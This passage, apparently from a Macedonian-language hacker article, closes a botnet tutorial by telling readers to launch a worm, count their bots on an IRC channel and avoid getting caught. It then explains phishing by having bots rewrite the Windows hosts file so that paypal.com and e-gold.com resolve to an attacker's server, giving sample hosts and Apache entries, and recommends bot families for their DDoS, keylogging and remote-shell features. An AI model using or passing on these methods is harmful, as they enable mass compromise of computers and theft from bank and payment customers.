стартувајте го нашиот црв за пребарување на школка со голема брзина, пијте кафе (пиво, вотка, сок од домати), одете на каналот IRC наведен во својствата на ботот и набљудувајте го бројот на вашите подредени. Како заклучок, сакам да се поздравам со сите што ме познаваат и да ви посакам многу среќа. Не се фаќајте.
ХХХХХХХХХХХХХХХХХХХХХХХХХХХХ

Ранливоста во phpBB е релевантна до верзијата 2.0.16, иако програмерите тврдат дека ја поправиле во 2.0.11

Http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

Фишинг
Многу е погодно да се користат ботови како организација за фишинг. За да го направите ова, потребни ни се специјални страници дизајнирани за фишинг што ја имитираат страницата што ни треба и добар хостинг, посветен сервер или VDS. Можете сами да направите такви страници, да ги купите или да ги најдете на интернет. Изборот е огромен. Најчесто, фишингот се организира на страниците: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.c om и други, на овој или оној начин, поврзани со е-трговија. Следно, ботот на Windows ја препишува датотеката \system32\drivers\etc\hosts со додавање на IP адресата на вашиот сервер на неа и доделување на псевдонимот на страницата што ви треба на неа. Форматот на датотеката е:

102.54.94.97 e-gold.com 102.54.94.97 paypal.com

Односно, со впишување на страниците e-gold.com и paypal.com во прелистувачот, корисникот завршува на нашиот сервер без да се сомнева во ништо. За возврат, на серверот на фишер, записите за соодветните домени се додаваат на httpd.conf.

DocumentRoot "/home/e-gold.com/www" Име на серверот "www.e-gold.com" ServerAlias ​​"e-gold.com" "www.e-gold.com"

Се разбира, линијата на прелистувачот ќе ја содржи познатата адреса e-gold.com, па дури и напреден корисник ќе се најави на страницата без да се сомнева во ништо. За да ја комплетирам сликата, ќе кажам дека ако корисникот користи прокси-сервер, тогаш овој метод нема да работи

Ботови за секој вкус
Agobot/Phatbot/Forbot/XtremBot
Ова е најдоброто семејство на ботови. Напишано во C++. Тие имаат многу заштитни функции за откривање и повеќе од 500 модификации поради јасно дефинираната модуларна структура.
SDBot/RBot/UrBot/UrXBot
Ботови кои се многу популарни во моментот за извршување DDOS напади. Тие имаат многу дополнителни функции. Како што се отворање на Sock4, keylogger, автоматски скенер за пропусти на lsass и dcom. Исто така, има функција да ги пренасочува барањата до сајтовите на антивирусни компании на локален сервер со уредување на \system32\drivers\etc\hosts и инсталирање на мал лажен веб-сервер на портата 80.
DSNX ботови
Овој бот може да спроведува DDOS напади, скенирање на порти и некои други ситници.
Q8 ботови
Одличен бот за Nix системи. Се одликува со компактниот код (27 KB, се состои од една датотека) и добрата функционалност. Може динамички да се ажурира со преземање и стартување нова датотека. Добро ги спроведува основните имплементации на DDOS (SYN-flood, UDP-flood). Можност за извршување на системски команди. Добро се камуфлира и во системот.
Кајтен
Исто така добар бот за Unix/Linux системи. Може да отвори далечинска школка на заробен сервер.
Ботови базирани на Perl
Ова се многу мали ботови напишани во Perl. Се користи за DDOS напади на системи базирани на Unix.

---
Написот има голема пристрасност кон хакирањето, па ако не е јасно, прашајте.